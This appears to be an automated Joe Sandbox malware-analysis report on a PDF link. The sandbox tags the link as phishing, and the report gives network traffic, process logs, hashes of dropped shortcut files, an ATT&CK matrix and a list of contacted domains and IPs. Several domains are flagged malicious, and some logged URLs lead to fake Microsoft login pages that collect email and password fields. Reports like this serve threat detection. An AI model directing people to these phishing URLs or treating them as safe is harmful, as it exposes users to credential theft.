            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
            Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
            Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
            Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49717 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49719 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49765 version: TLS 1.2
            Source: classification engineClassification label: mal64.phis.win@35/44@46/215
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1928,i,18385623245875706424,1655197702028866165,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ik.imagekit.io/nrof2h909/Paul%20W.%20Shaffer.pdf?updatedAt=1736369068440"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1928,i,18385623245875706424,1655197702028866165,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Drive-by Compromise
            Windows Management Instrumentation2
            Browser Extensions
            1
            Process Injection
            3
            Masquerading
            OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            Registry Run Keys / Startup Folder
            1
            Registry Run Keys / Startup Folder
            1
            Process Injection
            LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            https://ik.imagekit.io/nrof2h909/Paul%20W.%20Shaffer.pdf?updatedAt=17363690684400%Avira URL Cloudsafe
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            file:///C:/Users/user/Downloads/downloaded.pdf0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            newnewdomnewbjbfcjfidd.pguhmxcggroup.top
            45.149.241.193
            truefalse
              unknown
              a.nel.cloudflare.com
              35.190.80.1
              truefalse
                high
                login.pguhmxcggroup.top
                45.149.241.193
                truetrue
                  unknown
                  jackoffjackofflilliilkillxoopoeadonline.top
                  188.114.97.3
                  truetrue
                    unknown
                    challenges.cloudflare.com
                    104.18.95.41
                    truefalse
                      high
                      s-part-0017.t-0009.t-msedge.net
                      13.107.246.45
                      truefalse
                        high
                        sni1gl.wpc.omegacdn.net
                        152.199.21.175
                        truefalse
                          high
                          www.google.com
                          142.250.185.228
                          truefalse
                            high
                            newnewdomnewdefijbfjhi.pguhmxcggroup.top
                            45.149.241.193
                            truefalse
                              unknown
                              d28h3jm4r3crf8.cloudfront.net
                              65.9.66.41
                              truefalse
                                unknown
                                portal.pguhmxcggroup.top
                                45.149.241.193
                                truefalse
                                  unknown
                                  iyd4h7bj22.xbslqfequn.workers.dev
                                  104.21.6.157
                                  truetrue
                                    unknown
                                    ik.imagekit.io
                                    unknown
                                    unknowntrue
                                      unknown
                                      aadcdn.msftauth.net
                                      unknown
                                      unknownfalse
                                        high
                                        NameMaliciousAntivirus DetectionReputation
                                        file:///C:/Users/user/Downloads/downloaded.pdftrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://jackoffjackofflilliilkillxoopoeadonline.top/drivefalse
                                          unknown
                                          https://ik.imagekit.io/nrof2h909/Paul%20W.%20Shaffer.pdf?updatedAt=1736369068440false
                                            unknown
                                            https://login.pguhmxcggroup.top/?B662gO8CW0E=aHR0cHM6Ly9vZmZpY2UuY29t&omn=bXN0ZXN0QGRvbWFpbi5jb20=false
                                              unknown
                                              https://jackoffjackofflilliilkillxoopoeadonline.top/drive/?email=test%40msonlinedomain.org&password=&btnSubmitSignIn=Nexttrue
                                                unknown
                                                https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=truetrue
                                                  unknown
                                                  https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.comfalse
                                                    unknown
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    142.250.185.228
                                                    www.google.comUnited States
                                                    15169GOOGLEUSfalse
                                                    216.58.206.74
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    13.107.246.45
                                                    s-part-0017.t-0009.t-msedge.netUnited States
                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    142.250.186.174
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    104.18.94.41
                                                    unknownUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    20.190.159.68
                                                    unknownUnited States
                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    142.250.185.142
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    142.250.184.227
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    35.190.80.1
                                                    a.nel.cloudflare.comUnited States
                                                    15169GOOGLEUSfalse
                                                    40.126.31.69
                                                    unknownUnited States
                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    65.9.66.13
                                                    unknownUnited States
                                                    16509AMAZON-02USfalse
                                                    45.149.241.193
                                                    newnewdomnewbjbfcjfidd.pguhmxcggroup.topGermany
                                                    701UUNETUStrue
                                                    142.250.185.67
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    40.126.32.134
                                                    unknownUnited States
                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    1.1.1.1
                                                    unknownAustralia
                                                    13335CLOUDFLARENETUSfalse
                                                    104.18.95.41
                                                    challenges.cloudflare.comUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    20.50.80.213
                                                    unknownUnited States
                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    64.233.167.84
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    239.255.255.250
                                                    unknownReserved
                                                    unknownunknownfalse
                                                    65.9.66.41
                                                    d28h3jm4r3crf8.cloudfront.netUnited States
                                                    16509AMAZON-02USfalse
                                                    188.114.97.3
                                                    jackoffjackofflilliilkillxoopoeadonline.topEuropean Union
                                                    13335CLOUDFLARENETUStrue
                                                    172.217.18.106
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    188.114.96.3
                                                    unknownEuropean Union
                                                    13335CLOUDFLARENETUSfalse
                                                    104.21.6.157
                                                    iyd4h7bj22.xbslqfequn.workers.devUnited States
                                                    13335CLOUDFLARENETUStrue
                                                    172.67.134.254
                                                    unknownUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    IP
                                                    192.168.2.16
                                                    192.168.2.4
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1586262
                                                    Start date and time:2025-01-08 22:32:29 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                    Sample URL:https://ik.imagekit.io/nrof2h909/Paul%20W.%20Shaffer.pdf?updatedAt=1736369068440
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:13
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • EGA enabled
                                                    Analysis Mode:stream
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal64.phis.win@35/44@46/215
                                                    • Exclude process from analysis (whitelisted): svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 142.250.184.227
                                                    • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, clientservices.googleapis.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                    • VT rate limit hit for: https://ik.imagekit.io/nrof2h909/Paul%20W.%20Shaffer.pdf?updatedAt=1736369068440
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 20:33:33 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2673
                                                    Entropy (8bit):3.9863495996006875
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:7934405FC9329309769EBAA8FAD764DB
                                                    SHA1:B07A00DCE372E61F6A893A21AD4DABDFE7D7E0AF
                                                    SHA-256:84F9B62256459C68A73DE781B5B02547521F29702199A909CDC04DBF707D8CA3
                                                    SHA-512:3EE4BC7ECF1837CAE05680539F05C0BA35F5378879A8D934A7318E504881F7B6EAE8DACFB0332C09481B61CBA0B928925CC3E46302E9D94579AAF342D855034D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,....r....b..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z&.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z0.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z0.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z0............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z1............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............m......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 20:33:33 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2675
                                                    Entropy (8bit):4.005870601885836
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:171A88AC7951A62D9C173AAEF897F0B0
                                                    SHA1:D2D097F2B7BBFDC43444F80BA8DA66DA1FB38F71
                                                    SHA-256:45516ED866A0A407576818990F2FBFF38B29EDD276A9F4A2979AA9DCD79FECF3
                                                    SHA-512:2B4EFDE227435E19E9E1140903F1D364542FD2F757043EBB7304FE5626F7CC63F58B3AA5E7DAA8825F2984AF5A599D6D455E74BB75195F591E19C93B737C70AD
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,........b..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z&.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z0.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z0.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z0............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z1............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............m......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2689
                                                    Entropy (8bit):4.012711703686035
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:89EC91BB33795B1A1726ACF1BCAD1520
                                                    SHA1:2EFDB21E49F3C32EF2D57E633B77CCA5A1DEA81D
                                                    SHA-256:4527ECF8614698B44B7AC279D0696D662E5C913100853AA9C537EB858C6476EA
                                                    SHA-512:912A592D8C5B668150181E43AF785A210CB9E831087A2C0659C08936DD093D5F6F737B694E8A8A49F6E2B1C910D6847E5C393C036E4C63A98621F930472529AD
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z&.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z0.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z0.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z0............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............m......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 20:33:33 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2677
                                                    Entropy (8bit):4.003520299751584
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:99510DFE4DD5C68FC417B582D3C64835
                                                    SHA1:2B933214E170C4397E186F145CB7230AF45D6751
                                                    SHA-256:D64EFEE8CD437E68AF5657DD001A4C29108BA1E1F0ACFAE2408DD7EAD884FA06
